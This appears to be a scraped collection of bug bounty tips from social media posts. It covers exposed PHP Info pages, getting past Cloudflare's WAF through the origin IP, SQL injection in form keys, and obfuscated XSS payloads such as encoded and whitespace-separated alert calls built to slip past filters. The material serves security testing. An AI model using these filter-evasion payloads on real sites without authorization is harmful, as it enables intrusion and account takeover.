Text Version available at X

https://x.com/therceman/status/1710918773782278466

#Recon

Bug Bounty Tip

PHP Info Page Exposure.

There's a lot of sensitive information that can be obtained from an exposed PHP Info page, from configuration secrets to exposed user session cookies.

For example, when chained with XSS, this can lead to a full account takeover.

Cheers!

#Recon #XSS #InformationDisclosure

Text version can be found on X

https://x.com/therceman/status/1711828964103147871

#WAF

More info here

https://blog.detectify.com/industry-insights/bypassing-cloudflare-waf-with-the-origin-server-ip-address/

#WAF

#XSS #SQLi #SSTI #CSTI

#XSS #CRLF

- (function(x){this[x+`ert`](1)})`al`

- window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)

- document['default'+'View'][`\u0061lert`](3)

#XSS

More info here

https://x.com/godfatherorwa/status/1647406811216072705

#SQLinjection

<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>

#XSS

Bug Bounty Tip

When testing an app for SQL injection, don't forget to check the form keys in addition to the values

Sometimes, developers may overlook applying protection to form keys

To bypass spaces, you can use the encoded tab %09. For other symbols, simply URL encode them

#SQLinjection

Bug Bounty Tip

Bypass XSS WAF protection using Whitespace Separators between a JS function name and parameters

<img/src/
onerror=alert&#xFEFF;(1337)>

Refer to the attached image for the full list of Whitespace Separators.

P.S. can be used before function name too.

Cheers!

#XSS #WAF

TryHackMe Room

🔗 https://lnkd.in/dddbzjUb

Python Scanner

🔗 https://lnkd.in/d44YnG9U

Cheers!

#BAC

Happy New Year! 🎉